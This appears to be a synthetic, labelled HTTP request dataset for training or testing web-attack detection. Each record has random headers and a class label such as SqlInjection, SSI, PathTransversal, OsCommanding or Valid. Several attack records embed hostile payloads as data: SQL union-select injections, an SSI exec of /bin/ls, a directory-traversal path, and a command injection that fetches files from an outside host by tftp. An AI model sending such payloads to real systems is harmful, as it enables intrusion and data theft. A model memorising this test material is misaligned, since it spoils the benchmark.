UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5493x774
Via: htfgc/2.3 www.lxqn.shtml, 0.8 www.8eyyrme.html, 8.8 www.rstwzs9.tiff
Transfer-Encoding: deflate
Upgrade: cAle/7.3, niilm/1.6
Warning: 089 www.y3btxe.jpeg "tnngrttahsrrneaYij" "Wed, 29 Oct 08 22:55:29 UTC"
X-Forwarded-For: 89.218.230.173
X-Serial-Number: 074898
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st09hi4c9yatwc=ynggsdaaaT5n&rrscet=t&2ii=mailtPwl/nanIn&iiihribeUe0=sedpt

End - Id: 4911
Start - Id: 35340
class: SqlInjection
GET /ptnaaaTonenelepCeNea/1tuTtinutOmimcOtux.gif?fdUsanaos=srs+tdaOrssn&el1xdsDr=%3B++++exec+++get_cust%28++++%27x%27%27+++union+++select++++object_name%2Cobject_type%2C%27%27x%27%27+from++user_objects+++++where+++++%27%275ces%27%27+++%3D+%27%27+%27++++%29%3B&3oiresseg=55&aus1mlfmoenohny=hidpdiansnc+h%27&6iAa=dp&hsho0=3nitgripoy3no HTTP/1.1
Host: 208.100.162.204
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-4;q=0.0, windows-1252
Accept-Encoding: identity;q=0.1, gzip;q=0.9, deflate;q=0.7, identity, deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 85.135.241.126
Cookie: 8iaiogt5TdN=sVi?eiel;tudwtgtfntredO=d mochadm;DzexecD=:s:stdinh asEy/eahoti@;ohetgj=vle];av
Cookie2: $Version="9"
Date: Sun, 20 Apr 08 03:02:09 CET
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Sun, 15 Nov 09 12:13:24 CET
If-Match: *
If-None-Match: *
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 6045
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: Digest qop=rr6oiAyu
Authorization: Digest qop=auth-int
Range: 16442-228208
Referer: http://A4atn.gov/rdc0adaC/lce2/aeia.asmx
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: ut9Fhentss (rK2MDRhbM7; 1XUpeMN10P)
UA-CPU: StrongARM
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5578x419
Via: 5.1 163.38.67.127, HTTP/8.7 www.1rwi.shtml, HTTP/7.1 www.tdrdo24t.jpg
Transfer-Encoding: compress
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35340
Start - Id: 40183
class: SSI
GET /w3PA80z.2pF6GQWJh/velih2/bIhihtnYyohj/gtess3cdifaitdwf/i34lcfdTosefsnuouhy/c2fromEDDU/o9diJIw5SIdogENMDrtK/Cw/a43V96/hlb9U4zAMIgaiVt/rFX9JYy.A.dPq/u2updateQc.tiff?ooos=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fls++++-l++%2Fhome%2Falj0ro%2Foimrr2h%22+++++--%3E&cyrxnsednc=bnVWVq1M&tlidr7eor3ibKa=lnymxtim&ctienew7=5tahdes&kw=Ot&befer=7680&CvYu4Vz=union+%3B%3Da&07mew=ett5&ergaIsEm=a&sstio5mhs=st0marebp18q7in4&7uCelinkallI98=8w-nfiaallvnpassthrumprocessing-instructionEcamt1&eeemetthtm=43EEoaZC88r HTTP/1.0
Host: www.eCmrsu.net:3
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: skedj-n, oi-me;q=0.6, hsther-tbxsEn;q=0.2, 3ha-in
Cache-Control: max-stale=14560
Client-ip: 115.108.199.194
Cookie: DVF6bsamr=saTMlE
Cookie2: $Version="405"
Date: Tue, 14 Dec 04 11:48:42 GMT
ETag: W/"H@uNPu6-jlj_N_vl47"
Expect: 100-continue
From: woeiond@etiwPn.it
If-Modified-Since: Sun, 15 Mar 09 15:23:15 UTC
If-Unmodified-Since: Sat, 28 Jun 08 21:21:16 CET
If-Match: *
If-None-Match: "E_yQGn3cE93KGQyAV"
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 9
Pragma: ej1hicts='in'
Proxy-Authorization: i3sd nmHattte=Gnylo
Authorization: Digest nc=ac4Fa0bE
Referer: http://www.zfDio6ab.biz/AnoEt/sG0H3rbi/azie.js
TE: gzip;q=0.1
Trailer: Max-Forwards
User-Agent: eikbvsi/7.9.0.6
UA-CPU: 68000
UA-OS: Mac OS X
Transfer-Encoding: compress
Upgrade: adn/7.5
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40183
Start - Id: 41643
class: SqlInjection
GET /p9NnYcatrP/em99xPYep7E/-stylemJ7r/oblxo/nnGyre/kqinsertnhcF-NUB/sleemIPmtnirha/aUkmrn5gopte9b/dane5thhya/lO5F-rvfprzxy./h2Xu./yuQ.nsf?tdnsto=iRv%3DTvi&vMaXA=ch6qS&hefeoeeech6lo=Ohh&eTefhswrdylezni=%27select++++customer_phone++%27%7C%7C%27from++customers+++%27%7C%7C%27where+++++customer_surname%3D%27%27%27%7C%7C+lv_surname%7C%7C%27%27%27+++and+++customer_type%3D1%27%3B&mcejadahofdn7=462554341&0Zl8sUZDs=sAgsSSq HTTP/1.1
Host: 253.61.247.117
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-1, x-mac-ce, iso-8859-2;q=0.3
Accept-Encoding: 
Accept-Language: tD-oss;q=0.0, iyosqlt2-0neZ;q=0.6, h-ms8Rs;q=0.7, yAEai-4ieqenr
Cache-Control: max-age=5
Client-ip: 94.45.7.230
Cookie: dhdsnMmmketou5=306525;access_log4nba=036139132;he6jj0ineberRf=cprda
Cookie2: $Version="927"
Date: Sat, 02 Dec 06 17:43:34 UTC
ETag: "G.mH2gAx08GB0m-A"
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: "TZlZS0tDeL5762D4jDCA"
If-Range: Fri, 27 May 05 11:30:42 GMT
Max-Forwards: 948
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: /6aneatth/lOirr3e/mggb/nratf/gtfbscd.tar
TE: chunked,trailers,trailers
Trailer: Accept
User-Agent: ed1Tcofi3l (e@lXSN; sSIIGz; bQzwt8aS; tXltQh)
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: FTP/2.3 www.iUwad2.jpg, 2.7 234.0.224.228, ryrhn/9.3 www.yost.tiff
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41643
Start - Id: 35448
class: SqlInjection
POST /apxAlUbVff7PRq3tBb/sg2WB/au2/deAKTodqtnttipTqy/stu/9x7L3u/0Ssmhprg8eol5eogoa/iyt0enchsiileNreopsy/ebIbMW-R6a.dll? HTTP/1.0
Content-Length: 23
Content-Encoding: identity
Content-Location: /teGpt/iugSxrnA.sh
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Sep 04 03:18:58 UTC
Host: www.sgVr4.fr
Connection: close
Accept: text/*, image/*;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cookie: eDby6h2n0ri2=es;dpr;ailm=h.eGsRlP.;llctd=2162582;soihtRrSs8eiat=4387975475
Date: Fri, 06 Aug 04 24:15:28 UTC
Referer: http://www.nioh.cz/nsr9eac.pdf
User-Agent: '     union  select sum(npry8n)     from  in--
Via: HTTP/7.2 www.sade.css, 6.6 46.230.109.76
Transfer-Encoding: eskmC

trumc=b3daR&al1=pHgAR-p

End - Id: 35448
Start - Id: 16182
class: Valid
GET /hpeoTlncniielkck/-m@LTSwAxRK/tIetie6ce/rsjc.49nlil3rWCY/retcoPp.@/eirrdwntitoo8ehggOpp/locationB29JYb2vmn8BvQ/nhYtnhfdArnomrMms/npo/Yw6.js?0sock_streambJnRe4V1Ru=81&wb9eHjapiuexp=eWV4Rbr5V.l&luotheuSOdtHe=2&@NYIXej=058&aedosx=rIyh&kf0cl-=sZu HTTP/1.0
Host: www.nTtc2i.org:80
Connection: dahBrHra
Accept: text/*;q=0.8
Accept-Charset: x-mac-icelandic;q=0.6
Accept-Encoding: deflate, compress, compress;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 8.227.150.151
Cookie: icet6fa0uNnlems=rs5Erhdoi;YOHr6=OnirtasnrnNefagd ;gowneymltsssec=Gm7xfcejnYm
Cookie2: $Version="114"
Date: Tue, 14 Apr 09 18:29:25 UTC
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: mpnioir=nome;7utacuek
From: oltae@ieknifNr4.org
If-Modified-Since: Tue, 17 Jan 06 22:12:12 CET
If-Unmodified-Since: Sat, 04 Jun 05 14:59:25 CET
If-Match: "uh5DP.TqwuP3x6c_O"
If-None-Match: *
If-Range: "zVMxA5@HaiGoY0oEpP"
Max-Forwards: 1764
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic YWlybDJjOXg6bG93YQ==
Authorization: Digest realm
Range: 2181-,58-,9-1
Referer: /noonuhwm/egaty/eisndhh.css
TE: deflate;q=0.7,chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 0.4; c5-Tc; rv:8.5.2) Gecko/61914271
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 6.1 203.162.164.190, HTTP/3.8 www.phwerc.shtml
Transfer-Encoding: compress
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 66.190.19.60
X-Serial-Number: 4241402409
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16182
Start - Id: 12529
class: Valid
GET /a3r2hhantnrc2aiiAne/eGZA0BO.ZoEpVCO2g0P/l8N-KzdWPVSvhFyD.js?lt0goa4mdil0es=9&2hneoauOdtt9=r%7E%25uO4+inputh+a%7E&59sprAtdaoNv=rt7JNo1mochaiAht&eht8rn15tdivi=ysform0lsc%28eeeych&t6eAhlhekh=she HTTP/1.0
Host: www.Jsmtasdha.be
Connection: close
Accept: video/quicktime, application/zip;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, compress;q=0.3, compress;q=0.8, deflate, compress
Accept-Language: dCtiO-oaeryE;q=0.6, lrr0et-rxtaiA;q=0.9
Cache-Control: no-store
Client-ip: 109.41.47.246
Cookie: toUr== rec6)admin t 1dr;oiiqykiIbrmo=);don9adc0mep=qsavS;hebgtth=oatdmrGvoelbje;bUscioep7ayl9t5=nWL33gF-oqdu
Cookie2: $Version="442"
Date: Fri, 29 Jun 07 17:18:22 GMT
ETag: "dRpCqRyMcTgVU0M8z"
Expect: sedlo=irnMm
From: sEao@syhnkioup.de
If-Modified-Since: Wed, 07 Jul 04 08:53:44 UTC
If-Unmodified-Since: Thu, 25 Jun 09 14:55:18 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 31 May 09 08:13:19 UTC
Max-Forwards: 47
MIME-Version: 3.3
Pragma: oteoltw=eiC
Proxy-Authorization: taeot 3ovn=rfarL
Authorization: NTLM bGVsYXVkZWF1cmF0SDZpbnNidHFhMmVyZXRrZXRzaGluc2VldGltZ2FpTmVscWVh
Range: 79521-822865,4-
Referer: /czh0/iMaAep/vdvd/ehm1.sh
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 1.0; nE-ta; rv:5.3.3) Gecko/86435700
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 580x349
Via: 8.2 44.215.221.32
Transfer-Encoding: 4eeC
Upgrade: AGSes/3.1
Warning: 009 www.ecnv.tiff "tiind6peciKeh3" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12529
Start - Id: 21679
class: Valid
GET /tthH9nh/.UAn4IA-body/tcva3onct8eZu8/tcXi.php4?Nuika6sm9nDOAb=inserttmpmochazt&auoAaertson4rta=w9A&decHsi7awdv=7416624&toleegi1si=g%3F&h3Oeymsi3x=ogov&e8sodo=72301979&jSfpB=o&2keEturgesqummI=r+a+o9t+%3BS&ltdbrsinnzcoee=9&nx37rOnetn=w3ty&satlSmoe=hf&astxl=+i&4oletemrs4=ikMc9aoz&z8jNE=wINLucFto&s24ed=ia-ua1j HTTP/1.0
Host: 27.3.127.198
Connection: hmylcpoe
Accept: audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: eda-ssTnlxln;q=0.5
Cache-Control: no-transform
Client-ip: 224.236.61.86
Cookie: spo1=fx-i;etyh3dgaeb6=0;ao13aapzFh2e=668;rl04=3421;3hykthe=01790
Cookie2: $Version="044"
Date: Wed, 11 Feb 09 09:38:55 UTC
ETag: W/"PMH3mRdbr9zn8H8bvP"
Expect: hAesog
From: hrhe@thdtgL.uk
If-Modified-Since: Thu, 18 Oct 07 11:03:00 CET
If-Unmodified-Since: Sat, 14 Apr 07 07:48:56 GMT
If-Match: *
If-None-Match: "HKfL5-tEfHfLMstF"
If-Range: Fri, 01 Sep 06 16:29:04 GMT
Max-Forwards: 930
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: naoa orne=tnlmssv
Authorization: NTLM bmdSbzNqaG10ZWVhZXMxbXhpbGlhZHJlcFBvY3BQam5lZWFyYm41RXc=
Range: 773-66462,33280-473765
Referer: /lmail/hq2df2H/a9cnel/aesuu/hlllr.sh
TE: gzip
Trailer: Accept-Language
User-Agent: rrtedyE8as2ue5p
UA-CPU: StrongARM
UA-Disp: 6270,1333,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5233x580
Via: 8.4 109.148.132.211, 7.9 www.o5tt.html
Transfer-Encoding: deflate
Upgrade: hg64u/5.4, Adda4o/9.1, ted/6.5
Warning: 604 www.tas1nyu.js "Uehtn0hm2ptete" 
X-Forwarded-For: 153.189.235.245
X-Serial-Number: 3680166238
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 21679
Start - Id: 772
class: Valid
GET /Be/ev@jrN2@v/iKpLh@node63@l3E/HR/g2/Loaa1le1e/nOJw90QxIEnGDBuBj9/hCw3dZqtoWOM-XLB/bh/CeeeotoaREt/ti0olr86erssi.php?aem6=539974&treaFssnrioEf=do&5ehHt=heweuIatf+yHf&dwo0ptfn8iTyez=UeehJosdov8PNhqoh&IvOmZ=serslfwtic%291n&asrrphmeoyni=%24d-y2eNi&5acserarhe=jKnK1L-V&eu=110584&pptnae5eii=31135&YUCbjh=tee%24htr4ucodrop HTTP/1.1
Host: 222.61.232.165
Connection: keep-alive
Accept: audio/*;q=0.6
Accept-Charset: iso-8859-9, windows-1255;q=0.5, x-mac-hebrew, x-mac-arabic;q=0.7, iso-8859-6
Accept-Encoding: compress;q=0.6
Accept-Language: *
Cache-Control: 0elrgfc=n
Client-ip: 83.119.31.221
Cookie: yisrhopVies7s=orua
Cookie2: $Version="29"
Date: Tue, 14 Apr 09 10:56:36 CET
ETag: W/"CV2kqb9FSMaJC4sdF2x"
Expect: tcNWgin=hrHalpcd;eQaelket
From: oiiarvIa@ua5Y7a.org
If-Modified-Since: Fri, 24 Aug 07 06:11:57 CET
If-Unmodified-Since: Fri, 04 Jun 04 04:52:00 GMT
If-Match: "1AzEeGoDHM9xpbb@j_"
If-None-Match: "Y@c95o2pLn97n51RP_WA"
If-Range: *
Max-Forwards: 97
MIME-Version: 0.6
Pragma: aa2raxs=t
Proxy-Authorization: Digest opaque="peradza"
Authorization: Basic ZGxlSXJFOmN0ZWFyYW9y
Range: 74705-710
Referer: http://www.fEio.org/ivtteTah/eekwQ/gtcps9Mr/5s9yeees/rnemeh4t.pl
TE: deflate,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/0.2 (compatible; Konqueror/1.8; Unix; y5wf; ste1ars)
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 260x3490
Via: sn9/5.8 www.edawe.gif
Transfer-Encoding: ymt3u; bgtowc=s8snT
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 40823
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 772
Start - Id: 7331
class: Valid
POST /RatafEddhintvj/otmAXnGA/bi0drAtinwre/tbncClcaraesrex/lox.html? HTTP/1.1
Content-Length: 90
Content-Language: yderre,ef,o8eobb
Content-Encoding: gzip
Content-Location: http://7topllmh.uk/uins/gfItdr/fieotlr1.jpg
Content-MD5: b2NBZVhjbjJBSWhyMnM5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 09:51:42 CET
Last-Modified: Fri, 13 Jul 07 18:46:23 GMT
Host: www.etnro.biz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: c7-ssvufmo3;q=0.5, mnlhckf-anoN;q=0.2, sjhn-lbgqs;q=0.3, s0-ftpmrxh
Cache-Control: nea='eni'
Client-ip: 217.32.33.14
Cookie: 8aairi=dbwx3w4;THS@wGRUX=13;lkmpna8la5ee9an=5048;ei3=Muon elogerm;ngqereetaoitxhs=x7sipassthruD=8m1sxterm1Usts
Cookie2: $Version="61"
Date: Tue, 04 Apr 06 17:59:16 GMT
ETag: "0f.tdNKOtoBuNtgNg"
Expect: esituigt
From: mHrrayts@zrc6snifaP.ch
If-Modified-Since: Thu, 26 May 05 19:27:30 UTC
If-Unmodified-Since: Fri, 18 May 07 12:22:46 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 8.2
Pragma: n='MhrCXhe'
Proxy-Authorization: NTLM Njllcmh0bmxBbnF0T2RhZWh3anVydGRzM25lZG9zZzZ1U3R0UGVqTm8=
Authorization: NTLM bnQ0T25hbm9naGVjdFRpc2JhZGRqb1l5c3JpaHIyYWVhdA==
Range: 8-57,12-302,31375-71
Referer: /eiec/hhoce2/teuti8i/gUvmh/5Ctet.nsf
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: epgeouglexhrmibar
UA-CPU: 68000
UA-Disp: 688,983,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1302x7380
Via: FTP/9.1 234.146.152.32, FTP/9.5 www.xtgAib.htm
Transfer-Encoding: compress
Upgrade: 5a1o/5.9, umu/3.5
Warning: 203 www.dmeaU2e.htm "snkasehreMi8RjfNhe" 
X-Forwarded-For: 10.175.216.186
X-Serial-Number: 0347000130099147
----: ------------------
~~~~~: ~~~~~~~~~~~~

len4rn4rn=Ninnenbietksler&ksam7catFw9q_rn=s6_mD@0rq&a1ebkH=2elbt&trtlnme6hv2=88&11ul6v=7

End - Id: 7331
Start - Id: 45364
class: PathTransversal
PUT /hdan1neiPsm/os/Me0rioniuwhc.png? HTTP/1.0
Content-Length: 313
Content-Language: ekiu,o
Content-Encoding: gzip
Content-Location: http://kndq.biz/ob8s/84inw/3hmn.swf
Content-MD5: cWhHY3R5aWRlbW9iYzRlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Sep 04 20:14:25 GMT
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: www.u25coa.biz
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: f-os;q=0.1, SSeh-Ov;q=0.7
Cache-Control: p5=nt6a
Client-ip: 76.203.238.234
Cookie: eL8boot.inin=3;Dale= aobjectrr;raueiews5uglu=mrwch;sryteita=iuorchem5
Cookie2: $Version="0"
Date: Fri, 13 Aug 04 24:00:21 CET
ETag: "tOSrx8eJa@kprlW9"
Expect: 100-continue
If-Modified-Since: Fri, 04 Jul 08 14:30:15 CET
If-Unmodified-Since: Tue, 20 Jul 04 05:38:07 GMT
If-Match: "tn84.XWBII__-9w@i574"
If-None-Match: "xKe7vNp18q9iB1QsC2j"
If-Range: Tue, 16 Mar 04 19:50:21 UTC
Max-Forwards: 3
MIME-Version: 8.8
Pragma: nir=y3reici
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: NTLM dW41NXJjaVRlcmVpVGNidGhhN25FcHNsbnRvaWh3aWluZGV6M3NvZQ==
Range: 53-,6570-433377,-5771
Referer: /yde0cnwd/fpininc.tar.gz
TE: trailers,gzip;q=0.4
Trailer: User-Agent
User-Agent: mnseluhaTU (a2zCge; fIkbeju; lUB9oqDU; q2j8Ryic)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 441x030
Via: 4.2 80.132.73.161:03802, FTP/5.3 169.59.183.25
Transfer-Encoding: gzip
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-_Ngroup by@V4J@=997&glqseodaldf17=6905&HBG4W7cOdocumentVFT=3607&etxnwr4=iMqLTFlU&nsbbhtdgsyfnuk=yhaSjfin>&jsce=/../../../Inetpub/iissamples/ilstme/liaralro/meitseal/taor.dll&cOo3k=ssbK (:|zmetwpleo~gc&uihree=e eiA&saumib=838618&e2ro0T=E67&Ndtmp9hLformyL1U-=r-JqPfkmtQi&hiLdUahh=154627

End - Id: 45364
Start - Id: 17473
class: Valid
GET /NLdropwyBN5M6ADl/tLkTjtZ3h_W.tiff?kgO@8E@tqF=83628123&ol70eAi=ktia&IhgesTRrtoPa=le96z43eh&oThjt9aeunjttb=azJO6lHc HTTP/1.1
Host: www.rhyte.org
Connection: r1Vanio9
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: amahrs-ne8vl, s-hinCt;q=0.9, ar-b1deoesO;q=0.4, u0eiL-rltlm, lpFa2d-me0ijee;q=0.4
Cache-Control: no-cache
Client-ip: 97.68.166.85
Cookie: W5vo=ehnhidtxeTiA8;doe0dpu5tiz=prPdesnneed;n6ji5cntpost=0032863637
Cookie2: $Version="41"
Date: Fri, 23 Apr 10 18:20:01 GMT
ETag: W/"W2xAl6_IAi_.dUMclZyL"
Expect: aunieea5
From: etymeoa@helshe8n.gov
If-Modified-Since: Fri, 22 Oct 04 05:06:59 GMT
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "3RCDWjIhFfTcPJGtnRJ"
If-None-Match: "22zmgpXDcANqG-S"
If-Range: "ouQ8qh1Y2_G@lW-"
Max-Forwards: 4272
MIME-Version: 2.9
Pragma: hrasanoj=e0et8
Proxy-Authorization: orneh aFtiplho=otgEmrk
Authorization: Digest uri=http://www.iNnoeIh.it/jsef4/Ut2o8Nn/qtfuv/slafUno/aolnfu.php4
Range: -46060,-501912,285072-125
Referer: /44Hbtyw.dll
TE: gzip;q=0.5
Trailer: If-None-Match
User-Agent: t9Mz7ccesmaghcmr0
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: HTTP/6.9 www.eoea0h.jpeg, 2.6 140.170.255.131, smssa/4.9 www.iycrs1oh.tiff
Transfer-Encoding: gzip
Upgrade: 8yndaa/8.9, dn8nen/3.7
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17473
Start - Id: 4006
class: Valid
POST /iZ1HN5BO3aSZ.z/oOornenT/tpfYG2aJ0iPFI/errtgrEt/sLpk_PzukqxisuJH/kqzzFailncu8/THFGvjeBm..exe? HTTP/1.0
Content-Length: 226
Content-Language: 9s2nbge6,tzooenns
Content-Encoding: identity
Content-Location: /ttxit/drgnra/n8l0/ltEuh.php3
Content-MD5: emtlN2F0RW5hY1JoYThhZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Sep 08 13:12:08 GMT
Last-Modified: Fri, 27 Jun 08 23:22:51 GMT
Host: www.i2udhnreaf.fr:80
Connection: close
Accept: video/quicktime, text/html;q=0.2, text/plain;q=0.7
Accept-Charset: utf-8, iso-8859-5, windows-1252;q=0.9
Accept-Encoding: deflate;q=0.8, deflate, deflate;q=0.0, deflate, deflate;q=0.7
Accept-Language: khegsVto-wlgaue;q=0.1, aw-On
Cache-Control: max-stale=2
Client-ip: 189.78.56.150
Cookie: sam.GGl=82352303
Cookie2: $Version="7"
Date: Tue, 05 Dec 06 12:53:49 CET
ETag: "sY36fokoNZ@qnTXU1"
Expect: lkbmaa3r=lhjs;eoslbesz
From: erOso4A0@Obex.be
If-Modified-Since: Thu, 22 Dec 05 17:01:12 GMT
If-Unmodified-Since: Tue, 31 Oct 06 20:57:59 CET
If-Match: *
If-None-Match: "4uKeet@4SNL29oSN7nw"
If-Range: *
Max-Forwards: 7530
MIME-Version: 0.9
Pragma: Ha0ln='Nute'
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: Basic dHRqbnJ0dzpoaGh2bWhh
Range: -097697,13-,-7
Referer: /oaibdem/duaa.png
TE: trailers,trailers,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.6 (Windows; U; Win98 8.6; qr-Iu; rv:8.7.1) Gecko/74904609
UA-CPU: Sparc
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 0.1 172.64.209.173
Transfer-Encoding: compress
Upgrade: oefTul/8.6, 0Euin/6.0, n5h/9.8, ghe/7.4, n3n48/3.1
Warning: 442 www.azjbyn.gif "uhemezissofcc" "Sun, 09 Sep 07 08:19:07 GMT"
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 4557721
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Jprocessing-instructionscripthiprocessing-instruction=fsmhEyynajne&tog=174446&ymrehrtsro6ejc6=83bJmmrSBvHS&rurpeoFiGyn=492&rnetLelrlGvrh==ridr9t mehavingrtB&11evalBoNRSOQ=Wtmailnc&doujfaEi=/ clac@include6fi&X-R9e.Pkopt=f

End - Id: 4006
Start - Id: 36736
class: OsCommanding
GET /vC/ot-/fofhNorostroeEyar/W.Sov3tcIQD@/apsisrseehednbh/7aao/s@LStEZyda/m8t8A5GJ0qH7czntl/bG-sM/telnetvar2nRWpsY/iRFUR2Z.cfm?O9eoro=12526&rnep9olel=Aeo&aoasedsN=803&fADnaeteaur=14&fdNerdxeNe=gsxrqmot0al&vbscriptNc0or3Z@WRhK=t+el&tv=83bntohhtlximhd&ifoLhlaEpe=dZPiSbEac6&uEsIfted7nroi=90513&gaOc@5=%5Cn+++uftp++++-p++++www.asannsicol.com++++%2Fnsng%2Fitastallma%2Fes%2Far%2Fniarie%2Filve&TOwrx=pWol HTTP/1.0
Host: www.kteteig.fr
Connection: ttlsiZth
Accept: image/gif, audio/x-wav
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 103.144.20.186
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="79"
Date: Fri, 19 Aug 05 07:08:47 UTC
ETag: W/"KQH1Ph8SYsJZUWFBCG"
Expect: 100-continue
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Sat, 26 Aug 06 19:08:23 GMT
If-Unmodified-Since: Fri, 30 Jul 04 24:20:32 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Dec 09 06:09:09 GMT
Max-Forwards: 418
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: Basic RGhlSTplcm1O
Range: -47510,582-0
Referer: /5rme5.gz
TE: trailers,trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/2.8 (compatible; maeb2; Linux i586; b9pyccwhb5; rraneole; erfwue)
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: qet46d/6.3 www.tT9o.gif
Transfer-Encoding: deflate
